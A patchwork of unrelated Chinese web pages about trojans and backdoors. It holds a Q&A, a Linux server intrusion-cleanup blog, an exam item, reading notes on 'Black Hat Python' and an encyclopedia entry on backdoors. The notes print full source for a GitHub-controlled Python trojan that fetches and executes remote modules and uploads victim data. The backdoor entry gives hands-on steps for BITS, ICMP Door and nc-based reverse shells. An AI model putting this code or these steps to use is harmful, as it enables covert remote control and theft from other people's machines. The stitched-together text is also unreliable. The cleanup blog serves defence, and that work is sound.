我是一个学习编程语言的新手 有一段时间了 现在没事 想学做一个简单的木马程序娱乐娱乐 求高手指点 我学的_百度知道
我是一个学习编程语言的新手 有一段时间了 现在没事 想学做一个简单的木马程序娱乐娱乐 求高手指点 我学的
我是学的C语言 C# 现在学的是.NET语言 2楼我只是想娱乐一下 我以后也是靠这个找工作的
我有更好的答案
谁跟你说要不VB的。VB语言已经不建议采用了。在外面也没有人招VB语言的人。要学语言就从基础学习。C语言是比较最基础的语言了。去买这本书《C语言程序设计》来开始学习吧。学得差不多，能做出一点小东西，再学JAVA或C++或C#等。
采纳率：31%
编程是解决问题的，不是娱乐的。
你学的是什么编程语言都不知道。
为您推荐：
其他类似问题
您可能关注的内容
木马程序的相关知识
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。记一次入侵Linux服务器和删除木马程序的经历
转载 &更新时间：日 10:11:18 & 作者：wangzan18
这篇文章主要介绍了记一次入侵Linux服务器和删除木马程序的经历的相关资料,需要的朋友可以参考下
晚上看到有台服务器流量跑的很高，明显和平常不一样，流量达到了800Mbps，第一感觉应该是中木马了，被人当做肉鸡了，在大量发包。
我们的服务器为了最好性能，防火墙（iptables）什么的都没有开启，但是服务器前面有物理防火墙，而且机器都是做的端口映射，也不是常见的端口，按理来说应该是满安全的，可能最近和木马有缘吧，老是让我遇到，也趁这次机会把发现过程记录一下。
二、发现并追踪处理
1、查看流量图发现问题
查看的时候网页非常卡，有的时候甚至没有响应。
2、top动态查看进程
我马上远程登录出问题的服务器，远程操作很卡，网卡出去的流量非常大，通过top发现了一个异常的进程占用资源比较高，名字不仔细看还真以为是一个Web服务进程。
4、结束异常进程并继续追踪
killall -9 nginx1
rm -f /etc/nginx1
干掉进程之后，流量立刻下来了，远程也不卡顿了，难道删掉程序文件，干掉异常进程我们就认为处理完成了么？想想也肯定没那么简单的，这个是木马啊，肯定还会自己生成程序文件（果然不出我所料，在我没有搞清楚之前，后面确实又生成了）我们得继续追查。
5、查看登录记录及日志文件secure
通过命令last查看账户登录记录，一切正常。查看系统文件message并没有发现什么，但是当我查看secure文件的时候发现有些异常，反正是和认证有关的，应该是尝试连进来控制发包？
7、更多异常文件的发现
查看定时任务文件crontab并没有发现什么一次，然后查看系统启动文件rc.local，也没有什么异常，然后进入/etc/init.d目录查看，发现比较奇怪的脚本文件DbSecuritySpt、selinux。
想到这里，替换的命令应该很多，单靠我们去找肯定是解决不了的，我的建议最好是重装操作系统，并做好安全策略，如果不重装，我下面给一下我的方法，具体行不行有待验证。
三、木马手动清除
现在综合总结了大概步骤如下：
1、简单判断有无木马
#有无下列文件
cat /etc/rc.d/init.d/selinux
cat /etc/rc.d/init.d/DbSecuritySpt
ls /usr/bin/bsd-port
ls /usr/bin/dpkgd
#查看大小是否正常
ls -lh /bin/netstat
ls -lh /bin/ps
ls -lh /usr/sbin/lsof
ls -lh /usr/sbin/ss
2、上传如下命令到/root下
ps netstat ss lsof
3、删除如下目录及文件
rm -rf /usr/bin/dpkgd (ps netstat lsof ss)
rm -rf /usr/bin/bsd-port #木马程序
rm -f /usr/bin/.sshd #木马后门
rm -f /tmp/gates.lod
rm -f /tmp/moni.lod
rm -f /etc/rc.d/init.d/DbSecuritySpt(启动上述描述的那些木马变种程序)
rm -f /etc/rc.d/rc1.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc2.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc3.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc4.d/S97DbSecuritySpt
rm -f /etc/rc.d/rc5.d/S97DbSecuritySpt
rm -f /etc/rc.d/init.d/selinux(默认是启动/usr/bin/bsd-port/getty)
rm -f /etc/rc.d/rc1.d/S99selinux
rm -f /etc/rc.d/rc2.d/S99selinux
rm -f /etc/rc.d/rc3.d/S99selinux
rm -f /etc/rc.d/rc4.d/S99selinux
rm -f /etc/rc.d/rc5.d/S99selinux
4、找出异常程序并杀死
5、删除含木马命令并重新安装(或者把上传的正常程序复制过去也行)
我自己重新安装好像不行，我是找的正常的机器复制的命令。
/root/chattr -i -a /bin/ps && rm /bin/ps -f
yum reinstall procps -y 或 cp /root/ps /bin
/root/chattr -i -a /bin/netstat && rm /bin/netstat -f
yum reinstall net-tools -y 或 cp /root/netstat /bin
/root/chattr -i -a /bin/lsof && rm /usr/sbin/lsof -f
yum reinstall lsof -y 或 cp /root/lsof /usr/sbin
/root/chattr -i -a /usr/sbin/ss && rm /usr/sbin/ss -f
yum -y reinstall iproute 或 cp /root/ss /usr/sbin
四、杀毒工具扫描
1、安装杀毒工具clamav
yum -y install clamav clamav-milter
2、启动服务
service clamd restart
3、更新病毒库
由于ClamAV不是最新版本，所以有告警信息。可以忽略或升级最新版本。
[root@mobile ~]# freshclam
ClamAV update process started at Sun Jan 31 03:15:52 2016
WARNING: Can't query current.cvd.clamav.net
WARNING: Invalid DNS reply. Falling back to HTTP mode.
Reading CVD header (main.cvd): WARNING: main.cvd not found on remote server
WARNING: Can't read main.cvd header from db.cn.clamav.net (IP: 185.100.64.62)
Trying again in 5 secs...
ClamAV update process started at Sun Jan 31 03:16:25 2016
WARNING: Can't query current.cvd.clamav.net
WARNING: Invalid DNS reply. Falling back to HTTP mode.
Reading CVD header (main.cvd): Trying host db.cn.clamav.net (200.236.31.1)...
main.cvd is up to date (version: 55, sigs: 2424225, f-level: 60, builder: neo)
Reading CVD header (daily.cvd): OK (IMS)
daily.cvd is up to date (version: 21325, sigs: 1824133, f-level: 63, builder: neo)
Reading CVD header (bytecode.cvd): OK (IMS)
bytecode.cvd is up to date (version: 271, sigs: 47, f-level: 63, builder: anvilleg)
4、扫描方法
可以使用clamscan -h查看相应的帮助信息
clamscan -r /etc --max-dir-recursion=5 -l /root/etcclamav.log
clamscan -r /bin --max-dir-recursion=5 -l /root/binclamav.log
clamscan -r /usr --max-dir-recursion=5 -l /root/usrclamav.log
clamscan -r --remove /usr/bin/bsd-port
clamscan -r --remove /usr/bin/
5、查看日志发现
把发现的命令删掉替换正常的
附录：Linux.BackDoor.Gates.5
经过查询资料，这个木马应该是Linux.BackDoor.Gates.5，找到一篇文件，内容具体如下：
某些用户有一种根深蒂固的观念，就是目前没有能够真正威胁Linux内核操作系统的恶意软件，然而这种观念正在面临越来越多的挑战。与4月相比，2014年5月Doctor Web公司的技术人员侦测到的Linux恶意软件数量创下了新纪录，六月份这些恶意软件名单中又增加了一系列新的Linux木马，这一新木马家族被命名为Linux.BackDoor.Gates。
在这里描述的是恶意软件家族Linux.BackDoor.Gates中的一个木马：Linux.BackDoor.Gates.5，此恶意软件结合了传统后门程序和DDoS攻击木马的功能，用于感染32位Linux版本，根据其特征可以断定，是与Linux.DnsAmp和Linux.DDoS家族木马同出于一个病毒编写者之手。新木马由两个功能模块构成：基本模块是能够执行不法分子所发指令的后门程序，第二个模块在安装过程中保存到硬盘，用于进行DDoS攻击。Linux.BackDoor.Gates.5在运行过程中收集并向不法分子转发受感染电脑的以下信息：
CPU核数（从/proc/cpuinfo读取）。
CPU速度（从/proc/cpuinfo读取）。
CPU使用（从/proc/stat读取）。
Gate'a的 IP（从/proc/net/route读取）。
Gate'a的MAC地址（从/proc/net/arp读取）。
网络接口信息（从/proc/net/dev读取）。
网络设备的MAC地址。
内存（使用/proc/meminfo中的MemTotal参数）。
发送和接收的数据量（从/proc/net/dev读取）。
操作系统名称和版本（通过调用uname命令）。
启动后，Linux.BackDoor.Gates.5会检查其启动文件夹的路径，根据检查得到的结果实现四种行为模式。
如果后门程序的可执行文件的路径与netstat、lsof、ps工具的路径不一致，木马会伪装成守护程序在系统中启动，然后进行初始化，在初始化过程中解压配置文件。配置文件包含木马运行所必须的各种数据，如管理服务器IP地址和端口、后门程序安装参数等。
根据配置文件中的g_iGatsIsFx参数值，木马或主动连接管理服务器，或等待连接：成功安装后，后门程序会检测与其连接的站点的IP地址，之后将站点作为命令服务器。
木马在安装过程中检查文件/tmp/moni.lock，如果该文件不为空，则读取其中的数据（PID进程）并“干掉”该ID进程。然后Linux.BackDoor.Gates.5会检查系统中是否启动了DDoS模块和后门程序自有进程（如果已启动，这些进程同样会被“干掉”）。如果配置文件中设置有专门的标志g_iIsService，木马通过在文件/etc/init.d/中写入命令行
#!/bin/bash\n&path_to_backdoor&将自己设为自启动，然后Linux.BackDoor.Gates.5创建下列符号链接：
ln -s /etc/init.d/DbSecuritySpt /etc/rc1.d/S97DbSecuritySpt
ln -s /etc/init.d/DbSecuritySpt /etc/rc2.d/S97DbSecuritySpt
ln -s /etc/init.d/DbSecuritySpt /etc/rc3.d/S97DbSecuritySpt
ln -s /etc/init.d/DbSecuritySpt /etc/rc4.d/S97DbSecuritySpt
如果在配置文件中设置有标志g_bDoBackdoor，木马同样会试图打开/root/.profile文件，检查其进程是否有root权限。然后后门程序将自己复制到/usr/bin/bsd-port/getty中并启动。在安装的最后阶段，Linux.BackDoor.Gates.5在文件夹/usr/bin/再次创建一个副本，命名为配置文件中设置的相应名称，并取代下列工具：
/bin/netstat
/usr/bin/netstat
/usr/bin/lsof
/usr/bin/ps
/usr/sbin/netstat
/usr/sbin/lsof
/usr/sbin/ps
木马以此完成安装，并开始调用基本功能。
执行另外两种算法时木马同样会伪装成守护进程在被感染电脑启动，检查其组件是否通过读取相应的.lock文件启动（如果未启动，则启动组件），但在保存文件和注册自启动时使用不同的名称。
与命令服务器设置连接后，Linux.BackDoor.Gates.5接收来自服务器的配置数据和僵尸电脑需完成的命令。按照不法分子的指令，木马能够实现自动更新，对指定IP地址和端口的远程站点发起或停止DDoS攻击，执行配置数据所包含的命令或通过与指定IP地址的远程站点建立连接来执行其他命令。
此后门程序的主要DDoS攻击目标是中国的服务器，然而不法分子攻击对象也包括其他国家。下图为利用此木马进行的DDoS攻击的地理分布：
您可能感兴趣的文章:
大家感兴趣的内容
12345678910
最近更新的内容
常用在线小工具当前位置： >
以下关于木马程序的叙述中，正确的是（ &）。
A.木马程序主要通过移动磁盘传播B. 木马程序的客户端运行在攻击者的机器上C. 木马程序的目的是使计算机或网络无法提供正常的服务D. Sniffer是典型的木马程序
所属学科：
试题类型：客观题
所属知识点：
试题分数：1.0 分
用户编号：8407340笔记时间： 15:26
笔记内容：本笔记为私密内容。
用户编号：8403423笔记时间： 12:25
笔记内容：& & 传播方式：& & 1、通过邮件附件、程序下载等形式传播& & 2、通过伪装网页登录过程，骗取用户信息进而传播& & 3、通过攻击系统安全漏洞传播木马，大量黑客使用专门的黑客工具来传播木马。木马程序危害在于多数有恶意企图，例如占用系统资源，降低电脑效能，危害本机信息安全（盗取QQ帐号、游戏帐号甚至银行帐号），将本机作为工具来攻击其他设备等。Sniffer 是用于拦截通过网络传输的TCP/IP/UDP/ICMP等数据包的一款工具，可用于分析网络应用协议，用于网络编程的调试、监控通过网络传输的数据、检测木马程序等。
用户编号：8402709笔记时间： 09:04
笔记内容：& & 1、首先，木马程序的思想是：我要获取一台计算机的资料，则要想办法放一个间谍放到这台机器里面，然后，我给间谍发请求，“需要得到计算机主人的银行卡号与密码”，间谍收集好情报之后，会反馈给我。& & 2、所以，在木马程序的体系结构中，分两部分，一部分是客户端，一部分是服务端。& & 由于一般情况我们对客户端/服务器模式的理解是：客户端发请求，服务端响应请求。& & 所以自然而然，木马程序中，黑客机器上装客户端，被攻击者装服务端（至于如何让被攻击者乖乖的装上服务端，黑客还是想了不少办法的，就包括现在在网上下载一些应用程序，安装时，是不是就存在杀毒软件报木马的情况？这就是一种方式，把木服务端嵌入到了其它的合法应用中）。& & 3、关于经典木马程序冰河的描述为：& & 网络客户/服务模式的原理是一台主机提供服务(服务器)，另一台主机接受服务(客户机)。作为服务器的主机一般会打开一个默认的端口并进行监听 (Listen), 如果有客户机向服务器的这一端口提出连接请求(Connect Request), 服务器上的相应程序就会自动运行，来应答客户机的请求，这个程序我们称为守护进程(UNIX的术语,不过已经被移植到了MS系统上)。对于冰河，被控制端就成为一台服务器，控制端则是一台客户机，G_server.exe是守护进程, G_client是客户端应用程序。
用户编号：8361183笔记时间： 09:19
笔记内容：本笔记为私密内容。
用户编号：8245548笔记时间： 14:41
笔记内容：& & 木马的客户端是运行在攻击者的机器上的，server端是运行在用户端的。
&&&&&&&&&&&&&&&希赛网 版权所有 & &&计算机世界如此宽广，畅游其中。
读书笔记 -《Python 黑帽子》 ( 五 )
读书笔记系列文章
一直都在读书，读了忘，忘了再读。不如把每次学到的东西都写下来
第六章 扩展 Burp 代理
这一章，作者介绍了攻击 Web应用 的一个好工具，Burp Suite，并且写了两个扩展工具，作为「顺手的工具」以实施攻击和扩展侦察。
下载 Burp，Kali 系统已经安装了这个工具，我也就省去了安装的过程。（Kali 棒棒的！）
先补充一些 Burp Suite 的东西再来看这一章吧，之前没用过。
Burp 模糊测试
在 Burp 中利用 Bing 服务
利用网站内容生成密码字典
（第六章的内容不打算认真的读了，先学会怎么使用 burp 再想着怎么写扩展）
第七章 基于 GitHub 的命令和控制
这一章的主要内容是写一个简单的木马，通过 GitHub 来控制木马。
关于git 和 GitHub 的使用方式就不用详细介绍了。
当初我学 git 和 GitHub 的时候，比较懒，不想自己搜索资料，就买了一本叫做《GitHub 入门和实践》学习了这些东西。
书写的比较啰嗦，是因为作者不仅讲解了代码，还记录了 git 的具体使用步骤。
关于 git 的介绍和使用方式，我就不写了。直接解释代码
先说一下这一章代码的功能。
木马程序肯定是放在靶机上的，木马程序的主循环会每隔一段时间去 github 读取配置文件。
如果配置文件表示有任务需要执行，那么尝试执行这个任务（如果这个任务所需要的 module本地没有，那就远程下载，再导入）
任务执行完成之后，形成 data文件，上传到 github 仓库的 data 目录
所以有几个关键功能
读取 github 的配置文件
读取 module 文件
动态导入 module 文件
上传执行结果
为了能够使用 github，需要先安装 github3.py 这个第三方库
使用这个库，登录 github，下载文件，上传文件，这样关键功能的1，2，4都解决了
关键功能3 使用了 python 的 syis.meth_path 来自定义如何导入模块，这个一会儿介绍木马程序的时候在说，也可以先看看这个网页 ，或者直接看这个第三方库的实现方式
先看一下最终的目录结构
root@kali:~/trojan
drwxr-xr-x 2 root root 4096 Feb 20 20:42 config
drwxr-xr-x 2 root root 4096 Feb 19 17:18 data
-rw-r--r-- 1 root root
301 Feb 20 21:45 git_trojan.py
drwxr-xr-x 2 root root 4096 Feb 20 20:34 modules
config目录存储了一个 json 文件。木马程序会读取这个文件，然后按照文件内容，执行命令。
modules放着一些 python 代码，每一个文件都有一个 run函数。木马程序会下载这些文件，然后根据命令需要，执行相应文件的 run 函数。
data 目录存储木马上传上来的数据
下面是几个例子
配置文件， 加入这个配置文件命名为 abc.json，那么编号为 abc 的木马程序会读取这个文件
"module": "dirlister"
"module": "environment"
modules 里面的environment.py，这是一个读取靶机环境变量的模块，假如配置文件里面配置了 environment，木马程序会下载这个文件，然后执行run函数
def run(**args):
print '[*] In environment module.'
return str(os.environ)
modules 里面的dirlister.py，同理，这个模块的功能是列出当前目录的文件
def run(**args):
print '[*] In dirlister module.'
files = os.listdir('.')
return str(files)
重点：木马程序
这本书的风格就是点到为止。这个木马程序比较简单，甚至 github 的帐号密码都是要写在 python 文件里面的。
这个程序的细节就不详细的写了，从整体上解释一下。
这个木马程序分为下面几个部分
1. 配置参数
2. 动态 import
3. 读取 github文件
4. 上传 github 文件
1. 配置参数
配置参数有多个，通过命名就能看出来它的功能。
我这里只介绍一些 trojan_id, 这个参数标识了这个木马程序的 id，木马程序会根据这个 id 值，下载配置文件。所以每一个木马程序都有独立的配置文件
2. 动态 import
这个功能刚开始的时候也有介绍，主要是利用了 python 的特性，设置 sys.meta_path，传入自定义类 GitImporter。具体工作原理可以参看上面写的 github项目
3. 读取 github 文件
读取 github 文件主要涉及到三个函数
connect_to_github : 连接 github，返回相应的 github 控制对象
get_file_contents : 使用上面的函数获取 github 对象，获取 github 中的文件内容
get_trojan_config : 使用上面的函数获取 该木马程序相对应的配置文件
4. 上传 github 文件
向 github 上传文件，同样需要使用 connect_to_github 与 github 建立连接。 然后调用 store_module_result 函数上床文件。
主循环是一个 while True 循环，当没有任务在执行的时候，会调用 get_trojan_config 来获取配置文件，然后生成新的线程执行 module_runner 函数。
module_runner 函数的主要功能是根据配置文件执行相应的 module，然后把执行的结果通过调用 store_module_result 函数上传到 GitHub。
import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
from github3 import login
trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules = []
task_queue = Queue.Queue()
configured = False
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self, fullname, path=None):
if configured:
print "[*] Attempting to retrieve %s" % fullname
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self, name):
module = imp.new_module(name)
exec self.current_module_code in module.__dict__
sys.modules[name] = module
return module
def connect_to_github():
gh = login(username="blackhatpythonbook", password="justin1234")
repo = gh.repository("blackhatpythonbook", "chapter7")
branch = repo.branch("master")
return gh, repo, branch
def get_file_contents(filepath):
gh, repo, branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filename.path:
print "[*] Found file %s" % filepath
blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True
for task in config:
if task['module'] not in sys.modules:
exec ("import %s" % task['module'])
return config
def store_module_result(data):
gh, repo, branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id, random.randint(1000, 100000))
repo.create_file(remote_path, "Commit message", base64.b64encode(data))
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
store_module_result(result)
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner, args=(task['module'],))
time.sleep(random.randint(1, 10))
time.sleep(random.randint(1000, 10000))
第八章 Windows 下木马的常用功能
第九章 玩转浏览器
第十章 Windows 系统提取
这三章的内容暂时没有太大兴趣，只是简单的浏览了一下
第十一章的内容还是挺好玩的。
没有更多推荐了，
加入CSDN，享受更精准的内容推荐，与500万程序员共同成长！后门程序_百度百科
清除历史记录关闭
声明：百科词条人人可编辑，词条创建和修改均免费，绝不存在官方及代理商付费代编，请勿上当受骗。
后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。
后门程序原理
后门程序就是留在计算机系统中，供某位特殊使用者通过某种特殊方式控制计算机系统的途径。
后门程序，跟我们通常所说的&木马&有联系也有区别。联系在于：都是隐藏在用户系统中向外发送信息,而且本身具有一定,以便机器对本机的控制。区别在于：木马是一个完整的软件,而后门则体积较小且功能都很单一。后门程序类似于（简称&木马&），其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。
后门程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其它电脑。
后门是一种登录系统的方法，它不仅绕过系统已有的安全设置，而且还能挫败系统上各种增强的安全设置。
而且,在病毒命名中，后门一般带有字样，而木马一般则是字样。
后门程序特点
后门包括从简单到奇特，有很多的类型。简单的后门可能只是建立一个新的账号，或者接管一个很少使用的账号;复杂的后门(包括木马)可能会绕过系统的安全认证而对系统有安全存取权。例如一个login程序，当你输入特定的密码时，你就能以管理员的权限来存取系统。
后门能相互关联，而且这个 技术被许多黑客所使用。例如，黑客可能使用密码破解一个或多个账号密码，黑客可能会建立一个或多个账号。一个黑客可以存取这个系统，黑客可能使用一些 技术或利用系统的某个漏洞来。黑客可能会对系统的配置文件进行小部分的修改，以降低系统的防卫性能。也可能会安装一个，使系统打开一个安全漏洞，以利于黑客完全掌握系统。
后门程序分类
后门可以按照很多方式来分类，标准不同自然分类就不同，为了便于大家理解，我们从技术方面来考虑后门程序的分类方法：
后门程序网页后门
此类后门程序一般都是上正常 的web服务来构造自己的连接方式，比如非常流行的、cgi脚本后门等。
，网络上针对的攻击事件渐渐少了，因为大家在认识到网络安全的重要性之后，最简单却又最有效的防护办法：升级，都被大家所认同，所以系统漏洞在以后的岁月中存活的周期会越来越短，而从最近的趋势来看，脚本漏洞已经渐渐取代了系统漏洞的地位，非常多的人开始研究起脚本漏洞来，sql注入也开始成为各大安全站点首要关注热点，找到的突破口，进而拿到服务器的系统。
asp、CGI、PHP这三个脚本大类在网络上的普遍运用带来了脚本后门在这三方面的发展。
线程插入后门
利用系统自身的某个服务或者，将后门程序插入到其中，具体原理原来《》曾具体讲解过，感兴趣的朋友可以查阅。这也是现在最流行的一个后门技术。
所谓的“”，是指在功能上有大的提升，比普通的单一功能的后门有很强的使用性，这种后门本身就相当于一个小的，能实现非常多的常见安全功能，适合新手使用————但是，功能越强，个人觉得反而脱离了后门“隐蔽”的初衷，具体看法就看各位使用者的喜好了。
和传统的类似的控制方法，采用“客户端/”的，通过某种特定的访问方式来启动后门进而控制。
root kit 6o f3H 3B
这个需要单独说明，其实把它单独列一个类在这里是不太恰当的，但是，root kit的出现大大改变了后门程序的思维角度和使用理念，可以说一个好的root kit就是一个完全的系统杀手!后文我们讲涉及到这方面，一定不会让大家失望!
上面是按照技术做的分类，除了这些方面，正向连接后门、反向连接后门等分类也是很常见的，其实如何分类是考虑的事，广大的使用者就不用考虑那么多了，我们看重的，只是功能!
后门程序线程插入
首先我们来简单解释一下什么是典型的&线程插入&后门:这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。也就是说，即使受控制端安装的拥有“应用程序访问权限”的功能，也不能对这样的后门进行有效的警告和拦截，也就使对方的防火墙形同虚设了!因为对它的查杀比较困难，这种后门本身的功能比较强大，是“居中家旅行、入侵攻击”的必备品哦!
这类的典范就是国内提倡网络共享的的BITS了，从它的推出以来，各类安全工具下载园地里BITS就高居榜首，非常多的朋友使用它的过程中感到了方便。
线程插入后门
使用范围：wind200/xp/2003
隐蔽程序：★★★★☆
使用难度：★★★☆☆
查杀难度：★★★★☆
BITS其实是Background Intelligent Transfer Servicer的缩写，可以在不知不觉中实现另一种意义的典型的插入后门，有以下特点：中看不到;平时没有端口，只是在系统中充当卧底的角色;提供正向连接和两种功能;仅适合用于windows 200/xp/2003。
首先我们用3389登录上，确定你有SYSTEM的权限，将BITS.DLL拷贝到上，执行CMD命令： 4 #R Br A
bits.dll,install
这样就激活了BIST，程序用这个特征的字符来辨认使用者，也就相当于你的密码了，然后：rundll32.exe BITS.dll,Uninstall
这是最简单的使用，这个后门除了隐蔽性好外，还有两大特点是非常 值得借鉴的：和正。虽然很多朋友经常听到这两个名词，但并不了解它们，端口复用就是利用系统正常的TCP端口通讯和控制，比如80、139等，这样的后门有个非常 大的好处就是非常 隐蔽，不用自己开端口也不会暴露自己的访问，因为通讯本身就是系统的正常访问!另一个是反向连接，这个很常 见，也是后门中一个经典思路，因为从上主动方问外边是不被禁止的，很多很历害的防火墙就怕这点!
的正向连接很简单，大家可以参考它的README，这种方式在服务器没有防火墙等措施的时候很管用，可以方便地连接，但是遇到有防火墙这样的方式就不灵了，得使用下面的方式： 70 +g3l
在本地使用监听(如：nc -l -p 1234)
用NC连接目标的任何一个防火墙允许的(80/139/445……)
输入激活命令：[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目标主机的CMD将会出现NC监听的端口2222，这样就实现了绕过防火墙的功能了。
后门程序扩展后门
所谓的扩展后门，在普通意义上理解，可以看成是将非常多的功能集成到了后门里，让后门本身就可以实现很多功能，方便直接控制或者，这类的后门非常受初学者的喜爱，通常集成了文件上传/下载、检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能，本身就是个小的工具包，功能强大。
类型：系统后门
使用范围：win2000/xp/2003
隐蔽程度：★★★★☆
使用难度：★★☆☆☆
危害程度：★★★★☆
查杀难度：★★★★☆
这个后门是扩展后门中很有代表性的一个，功能这全面让人叹为观止，它能实现如下比较有特色的功能：，可查看，杀进程(支持用进程名或PID来杀进程);管现(查看，删除，增加等功能);服务管理(停止，启动，枚举，配置，删除服务等功能)端口到功能();系统重启，关电源，注销等功能(reboot,poweroff,shutdown,logoff);密码功能;安装终端，修改终端端口功能;端口重定向功能(多，并且可限制连接者IP);HTTP服务功能(多线程，并且可限制连接者IP);Socd5代理功能(支持两种不同方式验证，可限制连接者IP);克隆账号，检测克隆账户功能(clone,checkclone);加强了的FindpassWord功能(可以得到所有登录用户，包括使用克隆账户用户密码);HTTP代理(完全匿名，支持oicq、 MSN、mirc等程序);其他辅助功能，http下载，删除日志，，恢复常用关联，枚举系统账户等。
当网络上刚推出这个后门的时候，非常多的人用它来替换自己原来使用的后门，一时间各处赞扬之声迭起，但多为一些普通的打捞手的心声，其实它和“后门”的原始定义是有出入的：一旦你需要实现越多的功能，那你的程序在执行、隐藏、稳定等方面就需要考虑非常多的问题，一个疏忽就会导致全盘皆败，所以不建议将此后门用在需要非常隐蔽的地方。
在安装后门前，需要使用它自带的EditServer.exe程序对进行非常详细的配置，从10个具体配置中，包括了插入、密码、IP登录邮件通告等方面，不难看出它的功能是非常强大的，隐蔽性也很强，下面说几个在入侵中常用的功能，相信经常玩入侵的朋友一定能发现它的强大之处：
Fport:列出进程到端口的列表，用于发现系统中运行程序所对应的端口，可以用来检测常见的隐蔽的后门。
Reboot:重启系统，如果你上传并运行了其他后门程序，并需要重启机器以便让后门正常工作，那使用这个命令吧! Uz
Shell:得到一个Dos Shell,这个不多讲了，直接得到或者上的cmd shell。
Pskill PID或：用于杀掉特定的服务，比如杀毒软件或者是防火墙。
Execute程序：在后台中，比如sniffer等。http://ip/文件名 保存文件名：下载程序，直接从网上down一个后门到服务器上。
Installterm端口：在没有安装的win2k服务版的系统中安装终端服务，重启系统后才生效，并可以自定义连接端口，比如不用3389而用其他端口。
StopService/StartService:停止或者启动某个系统服务，比如telnet。
CleanEvent:删除。
Redirect:TCP数据转发，这个功能是后门程序中非常出色的一个功能，可以通过某一端口的数据转发来控制内网的机器，在渗透入侵的时候非常管用!
EnumService:列举所有自动启动的服务的资料，比如后门、木马。
RegEdit:进入注册表操作模式，熟悉注册表的使用者终于在后门中找到了福音! !
Findpassword:得到所有登录用户密码，比我们常用的findpass功能可强多了。
总体来讲，Wineggdrop shell是后门程序中很出彩的一个，它经过作者几次大规模的修改和升级，已经趋于稳定，功能的强大当然没得说，但是由于功能太强大，被查杀和怀疑是难以避免的，所以很多人在使用Wineggdrop shell一段时间后就发现飞了，其实是很正常的事，我你出不用气馁，其实用很简单的方法就可以很好地提高它的隐蔽性，下文将有说明。
相对于Wineggdrop shell来说，独孤剑客的winshell在功能上就不那么全面了，但是笔者推荐新手更多的使用winshell而不是Wineggdrop shell，因为winshell功能除了获得一个shell以外，只加入了一些重启、关闭的命令，功能相对简单，但完全使用系统自带的cmd来执行命令，对系统学习和掌握也是非常有帮助的!
和wolf这两者都是国内早期顶尖的后门程序，程序的编制无疑是非常经典的，新手学习时使用这两款后门一定能让你明白很多系统相关东西，了解很多入侵思路和方法。
后门程序C/S后门
传统的常常使用C/S构架，这样的构架很方便控制，也在一定程度上避免了“万能密码”的情况出现，对后门私有化有一定的贡献，这方面分类比较模糊，很多后门可以归结到此类中，比如较巧妙的就是ICMP Door了
类型：系统后门
使用范围：win2000/xp/
隐蔽程度：★★★★★
使用难度：★★★☆☆
危害程度：★★★★☆
查杀难度：★★★★★
这个后门利用ICMP通道进行通信，所以不开任何端口，只是利用系统本身的ICMP包进行控制安装成系统服务后，开机自动运行，可以穿透很多防火墙——很明显可以看出它的最大特点：不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比，它的是很特殊的，连80端口都不用开放，不得不佩服务程序编制都在这方面独特的思维角度和眼光!
这个后门其实用途最广的地方在于突破网关后对内网计算机的控制，因为很多机密数据都是放在内网计算机上的，而控制内网计算机并不是我们想到位的商业网络进行，它的网络内部并不像我们常见的内网那样非常容易入侵和控制，因为该公司本身涉及到一些网络安全的服务，所以内网的防护是很到位的，在尝试过很多后门后，最后ICMP Door帮我实现了成功的渗透内网!由此笔者开始爱上这个后门。
首先使用icmpsrv.exe -install参数进行后门的安装，再使用icmpsend.exe IP进行控制，可以用：[http://xxx.xxx.xxx/admin.exe-hkfx.exe]方式下载文件，保存在[url=file://\\system32\]\\system32\[/url]目录下，文件名为hkfx.exe，程序名前的“-”不能省去，使用[pslist]还可以列出远程主机的进程名称和pid，再使用[pskill id]就可以杀进程了，同样，输入普通cmd命令，则远程主机也就执行了相关的命令。 ~HF1 ? %
这个后门是采用的c/s构架，必须要使用icmpsend才能激活，但是他也有自己的先天不足：后门依靠ICMP进行通讯，经过冲击波的洗礼后，很少有服务器还接受ICMP包了，很多都屏蔽掉了它，所以用它来控制服务器不是一个好办法，这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧?
后门程序账号后门
账号后门技术是指黑客为了长期控制目标计算机，通过后门在目标计算机中建立一个备用管理员账户的技术。一般采用克隆账户技术。克隆账户一般有两种方式，一个是手动克隆账户，一个是使用克隆工具。
后门程序程序案例
后门程序海阳顶端
这是ASP脚本方面流传非常广的一个脚本后门了，在经过几次大的改革后，推出了“海阳顶端ASP木马XP版”、“海阳顶端ASP木马红粉佳人版”等功能强大、使用方便的后门，想必经常接触脚本安全的朋友对这些都不会陌生。
海阳顶端ASP木马
使用范围：支持ASP、WEB访问
使用难度：★☆☆☆☆
危害程序：★★★☆☆
查杀难度：★★★☆☆
